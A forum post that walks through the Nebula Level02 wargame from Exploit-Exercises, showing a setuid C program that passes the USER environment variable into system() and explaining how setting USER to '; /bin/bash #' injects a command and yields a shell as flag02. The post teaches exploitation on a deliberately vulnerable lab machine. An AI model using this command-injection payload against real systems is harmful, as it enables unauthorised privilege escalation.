How to pwned Nebula : Level02 - Environnement Variable

Exploit-Exercice : Nebula


Introduction


In this level there is a weakness in the program, we will use that weakness to get a shell as the flag02 user

Level02 - Environnement Variable

Exploit-exercice give us the source code. We can analyse the code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}

The following line are what we should look for to pwned that level :

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);

The program simply run echo and print the USER’s variable content

To take advantage of this variable we will set the USER variable to our own content let’s try to inject the string Hacker

Well, this is good but now we want a shell
use the export command and inject “; /bin/bash #” this will run a shell and comment the is cool

You successfully inject code and pwned level02 !

3 Likes

Where can the info about logging into this nebula server be found?

All the info are on the official website Exploit-exercice You should download and run it

This is really cool, I never thought about using bash environment variables for code injection !

1 Like

This topic was automatically closed after 30 days. New replies are no longer allowed.